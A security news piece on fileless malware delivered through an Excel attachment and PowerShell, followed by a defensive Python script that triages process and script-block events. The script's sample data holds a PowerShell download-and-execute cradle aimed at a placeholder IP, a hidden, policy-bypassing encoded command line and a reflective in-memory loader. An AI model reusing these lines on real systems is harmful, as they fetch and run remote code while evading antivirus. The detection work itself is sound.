
Hiding in event logs and memory, fileless malware avoids AV

27th May 2022 | Security

“Please find attached the Payments Report for 04/27/2022,” read an email recently found by Fortinet’s FortiGuard Labs, the threat intelligence platform and research wing of the California-based cybersecurity provider Fortinet.

The attachment, to the surprise of no security-minded reader, was a malicious Excel document in which the undisclosed target could indeed find something attached: three kinds of malicious code.

The Fortinet discovery is an example of fileless malware: intrusive code that dodges signature-based antivirus tools by living not in files on disk but in memory, or in other stores a file scanner never reads, such as the Windows event logs mentioned in the headline.

Fileless malware uses a system’s own legitimate processes, tools and scripts to carry out the attack, an approach often described as living off the land.

The payments report, for example, executed code via PowerShell, Microsoft’s native task-automation and configuration-management shell, according to the Fortinet report. A cross-platform shell and scripting language, PowerShell lets administrators automate tasks such as ending a user session, displaying a pop-up message or deleting a file; in the case of the Fortinet findings, it was used to deploy the malware.

With fileless malware the payload is never written to disk as an executable of its own, so file-scanning antivirus has nothing to inspect. Catching it depends instead on the traces that do remain: the process that launched the script, the script content itself (recorded only if PowerShell logging is switched on) and what the code does once it is in memory.
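The Excel-to-PowerShell chain described above leaves two traces even when nothing is written to disk: the process relationship (an Office application spawning PowerShell) and the script content, which is visible on the command line and, once Script Block Logging is enabled, in event ID 4104 of the Microsoft-Windows-PowerShell/Operational log. The following Python is an added example, not code from the article or from Fortinet: it triages constructed process-creation and script-block events for those indicators and decodes an -EncodedCommand argument so the hidden second stage can be inspected. The sample events, the 198.51.100.7 documentation address and the indicator list are constructed for the example; real detections would feed it Sysmon or Security-log fields.

```python
"""Triage PowerShell activity for fileless-malware indicators.

Added example (not from the article or from Fortinet). When a payload never
touches disk, a defender is left with two signals: which process launched
PowerShell, and what PowerShell was asked to run. The second is visible on
the command line and, once Script Block Logging is enabled, in event ID 4104.
All events below are constructed for this example.
"""
import base64
import binascii
import re
from typing import Optional

# Office applications that have no business spawning a shell on a workstation.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Content indicators typical of in-memory loaders (the list is illustrative).
# PowerShell is case-insensitive, so the patterns are too.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I),
    "base64_payload": re.compile(r"frombase64string", re.I),
    "reflective_load": re.compile(r"\[reflection\.assembly\]::load", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
}

# -EncodedCommand and the prefixes PowerShell accepts for it (-e, -ec, -en, -enc)
# take base64 of the UTF-16LE script text.
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?|c|n)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/malformed."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def script_indicators(text: str) -> set[str]:
    """Names of the content indicators present in a script block or command line."""
    return {name for name, pattern in INDICATORS.items() if pattern.search(text)}


def triage_process_event(parent_image: str, image: str, command_line: str) -> dict:
    """Score a process-creation event (Sysmon ID 1 / Security 4688 style fields).

    Combines the parent-child relationship with the visible command line and
    with anything hidden behind -EncodedCommand.
    """
    findings = set()
    if (image.rsplit("\\", 1)[-1].lower() in POWERSHELL_IMAGES
            and parent_image.rsplit("\\", 1)[-1].lower() in OFFICE_PARENTS):
        findings.add("office_spawned_powershell")
    # Scan the command line with the base64 blob removed so random base64 text
    # cannot produce false matches; the decoded payload is scanned separately.
    findings |= script_indicators(ENCODED_ARG.sub("", command_line))
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        findings.add("encoded_command")
        findings |= script_indicators(decoded)
    return {"score": len(findings), "findings": sorted(findings), "decoded": decoded}


# Constructed sample data. The second stage is encoded here rather than pasted
# as a pre-computed blob, so the whole chain can be read end to end.
STAGE_TWO = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"
SAMPLE_ENCODED = base64.b64encode(STAGE_TWO.encode("utf-16-le")).decode("ascii")

MALICIOUS_EVENT = {
    "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "command_line": f"powershell.exe -nop -w hidden -ep bypass -enc {SAMPLE_ENCODED}",
}
BENIGN_EVENT = {
    "parent_image": r"C:\Windows\explorer.exe",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1",
}
# What a 4104 script-block event might carry for a reflective in-memory loader.
SAMPLE_SCRIPT_BLOCK = ("$bytes = [Convert]::FromBase64String($blob); "
                       "[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)")

if __name__ == "__main__":
    for label, event in (("malicious", MALICIOUS_EVENT), ("benign", BENIGN_EVENT)):
        print(label, triage_process_event(**event))
    print("script block", sorted(script_indicators(SAMPLE_SCRIPT_BLOCK)))
```

The point of decoding rather than merely flagging -EncodedCommand is that the visible command line of such a loader is often just `-nop -w hidden -enc ...`; the download cradle and the IEX call that actually matter only appear after the UTF-16LE base64 is unwrapped, and the same indicator patterns can then be run over the 4104 script-block text, which is what remains when the code never becomes a file.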
